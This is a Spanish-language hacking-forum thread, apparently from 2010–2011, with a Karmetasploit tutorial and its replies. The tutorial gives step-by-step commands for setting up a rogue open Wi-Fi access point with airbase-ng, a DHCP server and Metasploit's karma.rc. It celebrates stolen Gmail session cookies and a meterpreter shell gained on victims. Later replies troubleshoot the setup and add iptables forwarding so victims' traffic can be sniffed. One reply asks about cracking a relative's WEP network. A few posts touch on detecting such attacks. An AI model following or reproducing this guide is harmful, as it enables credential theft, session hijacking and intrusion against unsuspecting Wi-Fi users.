Título: [Metasploit] Karmetasploit Publicado por: Shell Root en 6 Enero 2010, 02:14 am KARMETASPLOIT Karmetasploit sirve para crear puntos de acceso falsos, capturar contraseñas, recopilar infomación, y llevar a los ataques de navegador contralos clientes. Resumiendo: Karmetasploit es una pasada. CONFIGURACIÓN Se necesita una pequeña instalación para poner en marcha Karmetasploit, el primer paso es obterner el plugin para nuestro Metasploit Framework. Código: wget http://metasploit.com/users/hdm/tools/karma.rc Una vez descagado, necesitamos configurar un poco la infraestructura que necesitaremos. Cuando los cientes se conecten al AP falso que tenemos, estarán esperando que se les asigne una IP, por eso necesitamos un pequeño servidor DHCP, así que vamos a instalar dhcpd3-server y a configurarlo. Código:
Código: option domain-name-servers 10.0.0.1; También necesitaremos instalar un par de cositas más. Código: sudo gem install activerecord sqlite3-ruby Ahora estamos preparados para empezar. EMPEZANDO Primero, vamos a poner nuestra tarjeta wireless en modo monitor Código: root@trashhgoo:/home/trashhgoo/Hacklab# airmon-ng start wlan0 Como sabréis, airmon-ng nos crea un dispositivo virtual en modo monitor, en este caso mon0, y es sobre el que vamos a levantar el AP. Código: root@trashhgoo:/home/trashhgoo/Hacklab# airbase-ng -P -C 30 -e "WIFI_GRATUITO" -v mon0 Esto nos creó una interfaz nueva, que está trabajando como AP, en mi caso: at0 ¿Qué hacemos ahora? Asignarle una IP y arrancar el servidor DHCP (Asignador de IP's automáticas, para el que no lo sepa) en él, así que abrimos otro shell, dejando el airbase-ng trabajando. Código: root@trashhgoo:/home/trashhgoo# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0 No le hagáis caso al "Permission denied", es sólo que no pudo crear un archivo (Este dhcpd3 es un protestón). Pues ya está funcionando! Qué os parece? No es maravilloso? No? Bueno, pues entonces vamos a seguir, que hasta ahora sólo lo estábamos preparando. UTILIZANDO KARMETASPLOIT Si utilizáis metasploit 3.2, tenéis que guardar karma.rb en la carpeta donde está msfconsole, si usáis la 3.3, tenéis que estar en la carpeta donde lo tenéis guardado o asignar la carpeta donde lo tenemos guardado. Código: root@trashhgoo:/home/trashhgoo# cd Hacklab Lo tenéis? Pues vamos a poner en marcha el chiringuito con un sencillo comando. Código: msfconsole -r karma.rc También podría haber puesto msfconsole -r /home/trashhgoo/Hacklab/karma.rc Y hala! A bailar! Ahora el propio msfconole es el que hará todo! Empezará a levantar servers, que no son más que trampas para los incautos que se conecten a nuestro AP. Cuando parezca que se para, pulsemos ENTER. Código: [*] Started reverse handler on port 3333 No os hacéis a una idea de la cantidad de exploits que tenemos cargados, a la espera de que algún incauto pique. Y qué pasa si pican? Pues lo veremos ahora... PICARON!!!! Código: [*] DNS 10.0.0.100:1276 XID 87 (IN::A www.msn.com) Vale, vale, vale... Un momento! Vamos a ver! Qué es todo esto? Bien, todo esto son los datos que nos está enviando nuestra pesca, y algo interesante es por ejemplo ese par de cookies que nos acaban de regalar. Código: [*] HTTP REQUEST 10.0.0.100 > gmail.google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY SON PARA GMAIL!! Pues ya podemos acceder a su correo (Risa malévola, sonido de órgano y llamas infernales saliendo del suelo iluminando una sonrisa malvada). Y aparte de esas pueden aparecernos muchas más, pero... Qué más puede pasar? Pues puede pasar que la pesca sea vulnerable a algún ataque, por lo que obtendríamos lo siguiente: Código:
Oh! Una sesión de meterpreter! Y sin hacer nada! No es estupendo? No, es Karmetasploit. Fuente: Not Spam http://foro.portalhacker.net/index.php/topic,100592.0.html Título: Re: [Metasploit] Karmetasploit Publicado por: TeCh en 6 Enero 2010, 14:17 pm Jajaja! Muy buen truco master! Te felicito! :D
Aunque tambien se podria hacer un MITM de paso! ;) Título: Re: [Metasploit] Karmetasploit Publicado por: trashhgoo en 6 Enero 2010, 15:31 pm Jajaja! Muy buen truco master! Te felicito! :D Master? Oish, gracias. =P Título: Re: [Metasploit] Karmetasploit Publicado por: d_pit en 7 Enero 2010, 17:03 pm podriamos hacer esto desde WIN? dentro de los receptores wifi q se pueden poner en modo monitor ...
Título: Re: [Metasploit] Karmetasploit Publicado por: trashhgoo en 8 Enero 2010, 11:35 am podriamos hacer esto desde WIN? dentro de los receptores wifi q se pueden poner en modo monitor ... Lo dudo, no sé cómo puedes configurar el servidor DHCP3 en Windows. Sorry Título: Re: [Metasploit] Karmetasploit Publicado por: pepeluxx en 8 Enero 2010, 17:13 pm Gracias por el aporte. La verdad es que esto tiene más peligro ... jaja
Bueno, el caso es que me da un error al conectar el cliente y no so como solucionarlo. Parece un error de DNS al asignar los datos el servidor DHCP. Alguna sugerencia? gracias Código: [-] fakedns: Resolv::DNS::DecodeError non-backward name pointer ["/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1423:in `get_labels'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1427:in `get_labels'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1409:in `get_name'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1668:in `decode_rdata'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1451:in `block in get_rr'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1355:in `get_length16'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1451:in `get_rr'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1332:in `block (2 levels) in decode'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1331:in `each'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1331:in `block in decode'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1348:in `initialize'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1312:in `new'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1312:in `decode'", "(eval):99:in `run'", "/opt/metasploit3/msf3/lib/msf/base/simple/auxiliary.rb:93:in `job_run_proc'", "/opt/metasploit3/msf3/lib/msf/base/simple/auxiliary.rb:69:in `block in run_simple'", "/opt/metasploit3/msf3/lib/rex/job_container.rb:36:in `call'", "/opt/metasploit3/msf3/lib/rex/job_container.rb:36:in `block in start'"] Título: Re: [Metasploit] Karmetasploit Publicado por: trashhgoo en 8 Enero 2010, 19:41 pm Configuraste correctamente el servidor DHCP3? Ejecutas MSF con privilegios de Root?
Título: Re: [Metasploit] Karmetasploit Publicado por: pepeluxx en 8 Enero 2010, 20:17 pm Si, ejecuto la consola de metasploit con root y el dhcp está corriendo bien:
Código: debian:~# ps -ef |grep dhcpd Lo que si que tengo es una duda con el dhcp-server. El caso es que tengo en el portátil dos wifis, una conectada a Internet y la otra, que es la que pongo en modo monitor. Antes de poner la segunda en modo monitor, el dhcpd ya está corriendo, por lo que me da el siguiente mensaje: Código: debian:~# airmon-ng start wlan1 El mensaje me refiero a: Código: Process with PID 10783 (dhclient3) is running on interface wlan0 También he probado a parar el demonio y luego arrancarlo desde el otro interface: Código: debian:~# /etc/init.d/dhcp3-server stop Pero tampoco va y el mensaje de la consola me da que pensar que igual me falta por instalar algún script para las DNSs ... Gracias Título: Re: [Metasploit] Karmetasploit Publicado por: trashhgoo en 8 Enero 2010, 21:32 pm Pues la verdad es que no termino de entender el error, pero a ver si llegamos a una solución para añadirla en el manual, como posibles errores.
En un principio te diria que hicieras su msfupdate. El caso es que cuando lo hice por primera vez, me pidio que instalara un par de gems mas, y lo hice, pero no tome nota de ello, y no lo inclui en el manual. Sorry Título: Re: [Metasploit] Karmetasploit Publicado por: pepeluxx en 9 Enero 2010, 16:18 pm Tengo todos los plugins de metasploit actualizados. El problema creo que viene en el dhcpd
La wifi se arranca y me conecto desde otro PC pero no puedo navegar. Lo revisaré a ver ... Título: Re: [Metasploit] Karmetasploit Publicado por: trashhgoo en 9 Enero 2010, 17:21 pm KIETO AHI! SALE LOADING...?
Si la respuesta es SI, es normal, es una web fake k captura las cookies. Solo aceptamos conexiones entrantes, no ofrecemos una redireccion hacia afuera! Título: Re: [Metasploit] Karmetasploit Publicado por: pepeluxx en 9 Enero 2010, 17:28 pm Hola de nuevo ...
Me he fijado que cuando arranco el dhcpd me dice esto: Código: Wrote 1 leases to leases file. Cuando veo que debe salir esto: Código: root@trashhgoo:/home/trashhgoo# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0 Qué os crea en /var/lib/dhcp3/dhcpd.leasses ??? Título: Re: [Metasploit] Karmetasploit Publicado por: pepeluxx en 9 Enero 2010, 17:29 pm Hola de nuevo ... Me he fijado que cuando arranco el dhcpd me dice esto: Código: Wrote 0 leases to leases file. Cuando veo que debe salir esto: Código: root@trashhgoo:/home/trashhgoo# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0 Qué os crea en /var/lib/dhcp3/dhcpd.leasses ??? Título: Re: [Metasploit] Karmetasploit Publicado por: trashhgoo en 9 Enero 2010, 17:38 pm Código: # The format of this file is documented in the dhcpd.leases(5) manual page. Título: Re: [Metasploit] Karmetasploit Publicado por: pepeluxx en 9 Enero 2010, 17:48 pm Pues a mi no me crea nada ... se supone que 00:21:00:95:26:b3 es la mac de at0 ?
Título: Re: [Metasploit] Karmetasploit Publicado por: trashhgoo en 9 Enero 2010, 17:58 pm Estas mirandolo bien? Ejecutandolo con prilevios de administrador?
Por lo que tengo entendido es el archivo donde se guardan los datos de los clientes de la red, de cuando se les asigna una IP. Así que supongo que /var/lib/dhcp3/dhcpd.leases OJO, ES LEASES, no LEASSES es la tabla ARP. No lo puedo decir a ciencia cierta, es simplemente una suposición. :silbar: Título: Re: [Metasploit] Karmetasploit Publicado por: pepeluxx en 10 Enero 2010, 00:56 am Pues debía ser cosa de mi linux (o de mi wifi) porque probé en otro PC y va bien :)
gracias Título: Re: [Metasploit] Karmetasploit Publicado por: trashhgoo en 10 Enero 2010, 03:55 am Me alegro de que lo consiguieras, eso es que el tutorial está bien escrito. Muchas gracias a ti.
Un saludo Título: Re: [Metasploit] Karmetasploit Publicado por: pepeluxx en 10 Enero 2010, 13:11 pm No se si lo sabeis pero es posible modificar la página que sale por defecto (una negra que pone loading ...) cambiando /opt/metasploit3/msf3/data/exploits/capture/http/index.html y personalizarla a nuestro gusto
Además también se pueden personalizar las urls de donde se intenta extraer la cookie con el fichero /opt/metasploit3/msf3/data/exploits/capture/http/sites.txt Un pequeño script que arrancaría todo de golpe podría ser: Código: #!/bin/bash saludos Título: Re: [Metasploit] Karmetasploit Publicado por: trashhgoo en 10 Enero 2010, 13:41 pm Es una buena idea la de facilitar el trabajo con un script. Si no te importa, lo añadiré al tutorial original. ;-)
Título: Re: [Metasploit] Karmetasploit Publicado por: pepeluxx en 10 Enero 2010, 15:07 pm claro :) si lo único que hago es reunir todos los comandos que pusisteis en un único fichero :D
Título: Re: [Metasploit] Karmetasploit Publicado por: trashhgoo en 11 Enero 2010, 02:33 am Ya, pero no había pensado en eso. Jaja. :rolleyes:
Título: Re: [Metasploit] Karmetasploit Publicado por: elrond30 en 11 Enero 2010, 10:18 am Hola Shell root:
Quiero analizar varias herramientas que sirvan para hacer lo que el Karmetasploit. Por eso me gustaría preguntarte una cosilla. Como información tan detallada de alguna herramienta solo he encontrado tu manual, me gustaría saber tu opinión si conoces alguna herramienta más de cual es mejor. Al final se trata de identificar posibles ataques a redes inalámbricas, claro que me interesan solo las herramientas de software libre para poder hacer posibles mejoras. Si conoces alguna más indicamelas y tu opinión sobre cual es mejor. Muchas gracias Título: Re: [Metasploit] Karmetasploit Publicado por: Shell Root en 11 Enero 2010, 18:52 pm Emmm! Perdon pero el tuto no es mio, es de trashhgoo, y aun no lo he probado, asi que no puedo ayudarté, pero seguro que mi amigo trashhgoo SÍ.
Título: Re: [Metasploit] Karmetasploit Publicado por: elrond30 en 12 Enero 2010, 09:13 am A perdon, abre mirado mal, pues trashhgoo, el tuto muy bueno, si me puedes contestar a la pregunta que he echo antes para Shell Root te lo agradecería. Yo conozco un poco la herramienta Fake AP, pero me interesa tener alguna opinión sobre cual es mejor para la detección de ataques wifi.
Muchas gracias Título: Re: [Metasploit] Karmetasploit Publicado por: trashhgoo en 12 Enero 2010, 10:26 am Emmm! Perdon pero el tuto no es mio, es de trashhgoo, y aun no lo he probado, asi que no puedo ayudarté, pero seguro que mi amigo trashhgoo SÍ. Yeah! Karma +1 compañero. ^^ A perdon, abre mirado mal, pues trashhgoo, el tuto muy bueno, si me puedes contestar a la pregunta que he echo antes para Shell Root te lo agradecería. Yo conozco un poco la herramienta Fake AP, pero me interesa tener alguna opinión sobre cual es mejor para la detección de ataques wifi. Muchas gracias Veamos, yo creo que para comprobar ataques a redes wifi, con airodump-ng es mas que suficiente, fijándonos en los siguientes detalles: Red protegida con WEP: Si nos empiezan a inyectar tráfico, veremos que los #Data suben a toda velocidad entre "alguien" conectado a la red y el AP. La verdad es que cuando inyectamos tráfico llamamos muchísimo la atención. Red protegida con WPA: Pues la verdad, no sé, la gente no suele complicarse mucho, si ven una WPA, simplemente la descartan y van a por otra con WEP, ya que es complicado y poco fructífero romper las WPA. Todo el mundo consigue el handshake, y despues no tiene diccionarios y la fuerza bruta tarda lo suficiente como para ser desesperante. Karmetasploit es malicioso, muy malicioso, y no le veo utilidad para monitorear redes. Para la monitorización de redes, te recomiendo airodump-ng y el gran clásico: Kismet Fake AP? No lo conozco. Es para plataforma Win, supongo... Ahí no te puedo ayudar. Sorry Título: Re: [Metasploit] Karmetasploit Publicado por: elrond30 en 12 Enero 2010, 10:57 am FakeAP es para Linux, sirve bien para lo que quiero hacer, ya que no solo quiero monitorear, sino que lo que pretendo es crear un AP falso y ocultar el verdadero, y luego actuar yo de atacante. El FakeAP crea tantos AP como quieras y además creo que detecta ataques, pero nose cuales detecta y cuales no. Al final lo que pretendo es estudiar un poco más en profundidad el uso de honeypot en redes wifi.
Título: Re: [Metasploit] Karmetasploit Publicado por: trashhgoo en 12 Enero 2010, 11:12 am Me parece una estupenda iniciativa, pero no sé hasta qué punto sería útil un honeypot en WiFi.
A todo esto, creo que te capto. Lo que pretendes es que un AP falso suplante a uno verdadero, no? Todo sería crear el AP falso (Yo te recomendaría mejor airbase-ng, ya que los chicos de aircrack-ng han crecido mucho en el wireless) con cifrado WEP, la misma dirección MAC que el verdadero, y con el mismo BSSID, en el mismo canal, y ocultar el BSSID del AP verdadero, aunque no sé, quizá así existan interferencias. Es algo que no me había planteado, pero creo que sí se podría hacer con Karmetasploit, cambiando la MAC de tu tarjeta wifi con macchanger. No puedo aconsejarte otras herramientas porque las desconozco, pero creo que eso va en otro post. Un saludo Título: Re: [Metasploit] Karmetasploit Publicado por: elrond30 en 12 Enero 2010, 11:21 am Vale muchas gracias. Esto es parte de un proyecto de investigación que estoy llevando a cabo. Depende como se mire es bastante util, porque una empresa podría crear un AP falso para posibles ataques que pudiera sufrir de gente externa a la empresa. Cuando acabe mi investigación colgare los resultados en un post, aunque eso será en Marzo más o menos.
Muchas gracias Título: Re: [Metasploit] Karmetasploit Publicado por: trashhgoo en 12 Enero 2010, 11:41 am Hmmm... Más bien creo que en las empresas, para evitar problemas de ese tipo, utilizan red cableada, pero bueno. :silbar:
Pero está muy bien, igual gracias a tu proyecto descubrimos algo interesante. Suerte con él. Un saludo Título: Re: [Metasploit] Karmetasploit Publicado por: pUzzLe en 12 Enero 2010, 12:58 pm Felicidades trashhgoo magnifico tuto.
Pero no pillo una cosa, la conexión verdadera es la de tu wifi. Lo que haces es ponerte de sniffer creando un AP falso no? Una mente mala podría hacer grandes destrozos con este tutorial :P saludos Título: Re: [Metasploit] Karmetasploit Publicado por: pepeluxx en 12 Enero 2010, 13:19 pm Pero no pillo una cosa, la conexión verdadera es la de tu wifi. Lo que haces es ponerte de sniffer creando un AP falso no? En principio con una unica wifi (sin mas conexiones que te den acceso a Internet) te sobra ya que lo único que hace es robar cookies y cuentas sin dar acceso a Internet al usuario. No obstante, sí que podrías darle acceso a través de otra tarjeta usando las iptables ... algo así: Código: sysctl net.ipv4.ip_forward=1 donde eth0 es la tarjeta que te da acceso a Internet (también podría ser otra wifi en lugar de una ethernet) Sería necesario además del dhcpd3, instalar bind o cualquier otro servidor DNS para poder resolver nombres de dominio saludos Título: Re: [Metasploit] Karmetasploit Publicado por: S1dD3xt35 en 13 Enero 2010, 02:02 am esto es de lo mejor lo practicare mas alrrato
gracias men ;-) Título: Re: [Metasploit] Karmetasploit Publicado por: R007h en 13 Enero 2010, 03:32 am hey, shell root, cual es la lisencia de tus tutoriales "[metasploit]" se pueden copiar?? obviamente siempre poniendo el sitio y el autor...
Título: Re: [Metasploit] Karmetasploit Publicado por: trashhgoo en 18 Enero 2010, 12:10 pm hey, shell root, cual es la lisencia de tus tutoriales "[metasploit]" se pueden copiar?? obviamente siempre poniendo el sitio y el autor... Este tutorial es de libre distribución, siempre que se cite al autor (trashhgoo) y la fuente donde fue puesto el tutorial (portalhacker.net). Saludos Título: Re: [Metasploit] Karmetasploit Publicado por: Debci en 24 Enero 2010, 15:20 pm Haber una duda, si aqui en la fila del fondo xD
ESto crea un punto de aceso wifi falso? o usa mi punto wifi (que por ejemplo se wlan_c6) entonces alguien se conecta y todo lo que haga bajo esa red lo recivo yo, pero que wifi usa, uno falso o el mio? Saludos Título: Re: [Metasploit] Karmetasploit Publicado por: trashhgoo en 25 Enero 2010, 15:49 pm Haber una duda, si aqui en la fila del fondo xD ESto crea un punto de aceso wifi falso? o usa mi punto wifi (que por ejemplo se wlan_c6) entonces alguien se conecta y todo lo que haga bajo esa red lo recivo yo, pero que wifi usa, uno falso o el mio? Saludos Utiliza tu tarjeta wireless para crear un AP falso, tu router (por ejemplo wlan_c6) sigue intacto Saludos Título: Re: [Metasploit] Karmetasploit Publicado por: Snek35 en 1 Febrero 2010, 18:29 pm pero si tienes un router AP conectado por lan al pc, solo habria que ejecutar el karma.rc no?
Título: Re: [Metasploit] Karmetasploit Publicado por: pepeluxx en 1 Febrero 2010, 22:41 pm es indiferente que tengas un router o no.
Con un Pc y una wifi montas un AP falso desde donde el karma hace su trabajo Si además tienes uans segunda tarjeta ethernet (o wifi) conectada a un router, pues podrás navegar y hacer tus cosas mientras en el otro dispositivo está karma ... además, montando un servidor DNS y con un par de reglas en las Iptables, podrías dar salida a Internet a los que entren a través de tu AP falso y, esnifar todos los datos ... Título: Re: [Metasploit] Karmetasploit Publicado por: Snek35 en 2 Febrero 2010, 14:25 pm es indiferente que tengas un router o no. no me he explicado bien lo que digo es un router de esos que se ponen a un router antiguo para que tenga wifi, el AP solo tiene una entrada rj45, como el D_700APAirPlus, y por tanto se conectaria al ordenadorCon un Pc y una wifi montas un AP falso desde donde el karma hace su trabajo Si además tienes uans segunda tarjeta ethernet (o wifi) conectada a un router, pues podrás navegar y hacer tus cosas mientras en el otro dispositivo está karma ... además, montando un servidor DNS y con un par de reglas en las Iptables, podrías dar salida a Internet a los que entren a través de tu AP falso y, esnifar todos los datos ... Título: Re: [Metasploit] Karmetasploit Publicado por: pepeluxx en 2 Febrero 2010, 15:12 pm ... un router de esos que se ponen a un router antiguo para que tenga wifi ... Creo que sigues sin explicarte bien :D Título: Re: [Metasploit] Karmetasploit Publicado por: tragantras en 2 Febrero 2010, 16:50 pm pero si tienes un router AP conectado por lan al pc, solo habria que ejecutar el karma.rc no? vamos a ver el esquema es el siguiente INTERNET ---> tu_router ---> tu_pc ~ AP VIRTUAL <------ pc_victima con tu pc creas una conexión AD-HOC al otro pc, que a través de ti reciviría ( o no, segun se configure ) acceso a internet. Está claro que si no tiene acceso a internet, de poco o NADA va a servir esto... pues la gracia es robar cookies sesiones en general y demás info. Título: Re: [Metasploit] Karmetasploit Publicado por: Snek35 en 2 Febrero 2010, 17:43 pm ... un router de esos que se ponen a un router antiguo para que tenga wifi ... Creo que sigues sin explicarte bien :D En cuanto a lo que dijo es INTERNET ---> tu_router ---> tu_pc -->AP <------ pc_victima Título: Re: [Metasploit] Karmetasploit Publicado por: pepeluxx en 2 Febrero 2010, 20:06 pm vamos a ver el esquema es el siguiente INTERNET ---> tu_router ---> tu_pc ~ AP VIRTUAL <------ pc_victima con tu pc creas una conexión AD-HOC al otro pc, que a través de ti reciviría ( o no, segun se configure ) acceso a internet. Está claro que si no tiene acceso a internet, de poco o NADA va a servir esto... pues la gracia es robar cookies sesiones en general y demás info. Aunque no tengas el AP con conexión a Internet karma te sacará resultados. Piensa que una vez que la victima intente entrar a mail.google.com (por ejemplo) ya te manda las cookies aunque no tenga salida a Internet ... claro que si tuviera salida capturarías muchas más cosas Sería: router_internet ----> ((tarjeta fisica de tu PC --- tarjeta wifi de tu PC para el AP virtual)) <---- pc victima donde el PC tiene dos tarjetas, una conectada a Internet a través del router o de un modem y la otra que crea un AP virtual ... de este modo configurarías el bind y las iptables para dar acceso a Internet a la victima Pero lo que te decia es que si sólo tienes una tarjeta wifi sería: tarjeta wifi de tu PC para el AP virtual <---- pc victima y con eso te bastaría, aunque no le darías salida a Internet Título: Re: [Metasploit] Karmetasploit Publicado por: illera88 en 3 Febrero 2010, 23:34 pm Citar berto@ubuntu:~$ sudo apt-get install dhcpd3-server Esto por que es :huh: :huh:Leyendo lista de paquetes... Hecho Creando árbol de dependencias Leyendo la información de estado... Hecho E: No se pudo encontrar el paquete dhcpd3-server ya hice el Citar sudo apt-get update Un saludoTítulo: Re: [Metasploit] Karmetasploit Publicado por: pepeluxx en 3 Febrero 2010, 23:48 pm Porque quiers que cuando se conecte alguien a tu AP se le asigne una IP ... si no estás en la misma red que él no puedes capturar datos.
El truco está en que se te crea un dispositivo virtual (at0) al que asignas la IP 10.0.0.1 (por ejemplo) y dejas el DHCPD arrancado con ese dispositivo de manera que cuando se conecte alguien a ese AP se le asignará una IP de ese rango (por ejemplo 10.0.0.100-254) Título: Re: [Metasploit] Karmetasploit Publicado por: illera88 en 4 Febrero 2010, 00:21 am pero lo que pasa es que no se me instala el dhcp server. Me tira el error que te he copiado antes.
Un saludo y gracias Título: Re: [Metasploit] Karmetasploit Publicado por: pepeluxx en 4 Febrero 2010, 00:43 am pero lo que pasa es que no se me instala el dhcp server. Me tira el error que te he copiado antes. Un saludo y gracias Prueba a poner: $ sudo apt-get install dhcp3-server sin la D :) Título: Re: [Metasploit] Karmetasploit Publicado por: illera88 en 4 Febrero 2010, 11:48 am pero lo que pasa es que no se me instala el dhcp server. Me tira el error que te he copiado antes. Un saludo y gracias Prueba a poner: $ sudo apt-get install dhcp3-server sin la D :) Título: Re: [Metasploit] Karmetasploit Publicado por: trashhgoo en 20 Febrero 2010, 17:25 pm Si, bueno, es una erratilla de nada. :P
Lo modificaría, pero tiene que hacerlo algún mod o el mismo Shell Root Título: Re: [Metasploit] Karmetasploit Publicado por: nnooxx en 3 Marzo 2010, 19:32 pm Bueno el mensaje ya es un poco viejo pero aun asi nunca es tarde para agradecer un buen trabajo no XDXD Muy bueno muchas gracias ;-) ;-)
Título: Re: [Metasploit] Karmetasploit Publicado por: xv0 en 5 Marzo 2010, 16:26 pm Hola trashhgoo
Gracias por este buen trabajo, podria hacer esto con la red de mi tio que es wep, siguiendo los mismos pasos, pero haciendo todo desde mi ordenador, reventandole la red con aircrack-ng y hacer esos pasos, funcionaria? Un saludo crack Título: Re: [Metasploit] Karmetasploit Publicado por: Marmol en 13 Junio 2010, 22:00 pm buenas tengo una duda me pasa esto despues de poner el sigiente comando msfconsole -r' /opt/metasploit3/msf3/karma.rc' me pone luego esto ./opt/metasploit3/app/ruby: 1: Syntax error: "(" unexpected gracias por la paciencia que teneis con los novatos
Título: Re: [Metasploit] Karmetasploit Publicado por: Marmol en 27 Junio 2010, 21:58 pm ok ya lo solucione por si alguien le sirve me ayudo este video http://www.youtube.com/watch?v=Ne7hof-w0kU
Título: Re: [Metasploit] Karmetasploit Publicado por: memory_corruption en 16 Septiembre 2010, 12:10 pm Simplemente brillante! ;-)
Título: Re: [Metasploit] Karmetasploit Publicado por: programacionlinux en 2 Octubre 2010, 03:43 am fantastico !!! impecable !!!
Título: Re: [Metasploit] Karmetasploit Publicado por: Rafa2011 en 14 Marzo 2011, 23:41 pm Segui sus instrucciones paso a paso y no consigo resultados. Uso backtrack RD2. Solo quiero conseguir crear un AP Falso que de servicio de internet.
Tengo internet mediante ethernet (eth0) y wlan0 para ponerla en modo monitor, la cual me crea mon0. Creo el AP Falso, con otra computadora detecto la señal falsa, me conecto, pero me asigna la ip: 169.254.153.82 Pense que era error de dhcp3-server y procedi a parar el servicio e instalar dnsmasq, y sucede lo mismo, la maquina cliente obtiene la ip: 169.254.153.82 Se me hace extraño puesto que el rango del cual debe tomar la ip es: 192.168.4.1 -192.168.4.250 COmo puedo comprobar que mi dhcp server esta en funcionamiento y entregando las ips dentro del rango ? Que estoy haciendo mal? Si les sirve, aqui les dejo lo que he hecho: El dnsmasq ya lo tengo corriendo con la siguiente dnsmasq.conf: interface=at0 dhcp-range=192.168.4.1,192.168.4.250,12h despues escribo en la terminal: ~# airmon-ng start wlan0 Interface Chipset Driver wlan0 Broadcom b43 – [phy0] (monitor mode enabled on mon0) ~# airbase-ng -P -C 2 -c 6 –essid “wifi-gratis” mon0 06:33:53 Created tap interface at0 06:33:53 Trying to set MTU on at0 to 1500 06:33:53 Trying to set MTU on mon0 to 1800 06:33:53 Access Point with BSSID 00:1C:26:AB:E0:EF started. 06:34:54 Client 00:23:6C:17:2A:E3 associated (unencrypted) to ESSID: “wifi-gratis” Ya esta corriendo el AP falso, ya tambien esta corriendo el dnsmasq, asi que solo hago: echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE Despues procedo con otra computadora o iphone conectarme a la red wifi falsa y le asigna la ip:169.254.153.82 Por consiguiente no me logro conectar. Gracias de antemano por su colaboracion y/o apoyo. Título: Re: [Metasploit] Karmetasploit Publicado por: manmass en 17 Marzo 2011, 15:04 pm Hola chicos,
por mi parte todo correcto. Muy buen trabajo. Lo que he estado investigando es que nada más ejecutarse y levantar todos los exploits no dejan de entrarme mensajes a toda pastilla y no soy capaz de verlos a no ser que corte el proceso. Y ni si quiera hay nadie conectado!!!! ME podéis iluminar? puedo redirigir la salida del karma a un fichero? Gracias mákinas Título: Re: [Metasploit] Karmetasploit Publicado por: manmass en 18 Marzo 2011, 12:26 pm Hola chicos, por mi parte todo correcto. Muy buen trabajo. Lo que he estado investigando es que nada más ejecutarse y levantar todos los exploits no dejan de entrarme mensajes a toda pastilla y no soy capaz de verlos a no ser que corte el proceso. Y ni si quiera hay nadie conectado!!!! ME podéis iluminar? puedo redirigir la salida del karma a un fichero? Gracias mákinas Hola de nuevo, ya he descubierto por qué se me inundaba de mensajes la pantalla y seguro que a muchos de vosotros con Ubuntu os ocurre lo mismo. Después de hacer muchas pruebas descubrí que uno de los servidores que levanta karma.rc, en concreto el 5353 (mdns) se estaba pegando de leches con un servicio nativo de Ubuntu para poder resolver direcciones locales sin necesidad de tener un dns en la red, llamado "avahi-daemon". Simplemente parando el servicio y deshabilitándolo para que no levante cuando reinicias la máquina suficiente. Ahora veo la consola sin problemas y puedo operar. Enlace: http://viviendolared.blogspot.com/2010_04_01_archive.html Saludos Título: Re: [Metasploit] Karmetasploit Publicado por: manmass en 18 Marzo 2011, 16:23 pm Segui sus instrucciones paso a paso y no consigo resultados. Uso backtrack RD2. Solo quiero conseguir crear un AP Falso que de servicio de internet. Tengo internet mediante ethernet (eth0) y wlan0 para ponerla en modo monitor, la cual me crea mon0. Creo el AP Falso, con otra computadora detecto la señal falsa, me conecto, pero me asigna la ip: 169.254.153.82 Pense que era error de dhcp3-server y procedi a parar el servicio e instalar dnsmasq, y sucede lo mismo, la maquina cliente obtiene la ip: 169.254.153.82 Se me hace extraño puesto que el rango del cual debe tomar la ip es: 192.168.4.1 -192.168.4.250 COmo puedo comprobar que mi dhcp server esta en funcionamiento y entregando las ips dentro del rango ? Que estoy haciendo mal? Si les sirve, aqui les dejo lo que he hecho: El dnsmasq ya lo tengo corriendo con la siguiente dnsmasq.conf: interface=at0 dhcp-range=192.168.4.1,192.168.4.250,12h despues escribo en la terminal: ~# airmon-ng start wlan0 Interface Chipset Driver wlan0 Broadcom b43 – [phy0] (monitor mode enabled on mon0) ~# airbase-ng -P -C 2 -c 6 –essid “wifi-gratis” mon0 06:33:53 Created tap interface at0 06:33:53 Trying to set MTU on at0 to 1500 06:33:53 Trying to set MTU on mon0 to 1800 06:33:53 Access Point with BSSID 00:1C:26:AB:E0:EF started. 06:34:54 Client 00:23:6C:17:2A:E3 associated (unencrypted) to ESSID: “wifi-gratis” Ya esta corriendo el AP falso, ya tambien esta corriendo el dnsmasq, asi que solo hago: echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE Despues procedo con otra computadora o iphone conectarme a la red wifi falsa y le asigna la ip:169.254.153.82 Por consiguiente no me logro conectar. Gracias de antemano por su colaboracion y/o apoyo. Hola, se me ocurren varias cosas.... La primera es que de momento no probaría a activar la línea de iptables para poder dar salida a Internet, ya que creo que tu problema es anterior a todo eso, por tanto iría quitando pasos. Ejecutaría netstat -atun y comprobaría que el dhcp está corriendo. Tendría que salir algo así: udp 0 0 0.0.0.0:67 0.0.0.0:* udp 0 0 0.0.0.0:68 0.0.0.0:* El puerto importante es el 67 ya que es la parte servidora. El cliente dhcp usa el 68. Si no ves estos puertos es que tienes un problema levantando el servicio del dhcp. Por otro lado pienso que tu problema es exactamente ese, porque dice que ves el ap fake y te conectas pero después te pondrá algo así como "Conexión limitada" en Windows, verdad?. Windows (a partir de W2000 creo) te asigna una dirección apipa (169.254.x.x) cuando no encuentra un servidor dhcp para que pueda levantar todos los servicios de red. Además puedes poner un sniffer en el interface para ver que efectivamente están llegando dichas solicitudes: tcpdump -ni at0 -v Espero que puedas avanzar 